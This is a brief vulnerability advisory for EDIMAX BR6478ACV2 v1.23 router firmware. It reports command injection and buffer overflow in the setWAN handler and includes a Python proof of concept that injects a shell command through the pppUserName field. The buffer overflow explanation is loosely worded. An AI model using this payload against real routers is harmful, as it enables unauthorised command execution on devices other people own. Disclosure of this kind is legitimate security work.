EDIMAX-BR6478ACV2-setWAN

Overview

The device's official website: https://download.edimax.com/mw/cufiles/files/download/Firmware/BR6478ACV2_v1.23.zip

Affected version

BR6478ACV2_v1.23

Vulnerability details

The EDIMAX BR6478ACV2_v1.23 firmware has a command injection vulnerability in the setWAN function. The v7/v16/v29 variables receive the pppUserName/pptpUserName/L2TPUserName parameters from a POST request. However, since the user can control the input of these variables, the statement system() can cause a command injection.

The EDIMAX BR6478ACV2_v1.23 firmware has a buffer overflow vulnerability in the setWAN function. The v26/v27/v28/v39/v40/v41/v44/v45 variables receive the pptpIPAddr/pptpIPMaskAddr/pptpDfGateway/L2TPIPAddr/L2TPMaskAddr/L2TPDefGateway/dns1/dns2 parameters from a POST request. However, since the user can control the input of these variables, the statement system() can cause a buffer overflow.

POC

import requests

ip = "192.168.2.1"

payload = "$(ps>/1.txt)"
data = {"wanMode": "2", "pppUserName": payload}
url = f'http://{ip}/goform/setWAN'

res = requests.post(url=url, data=data, verify=False)
print(res)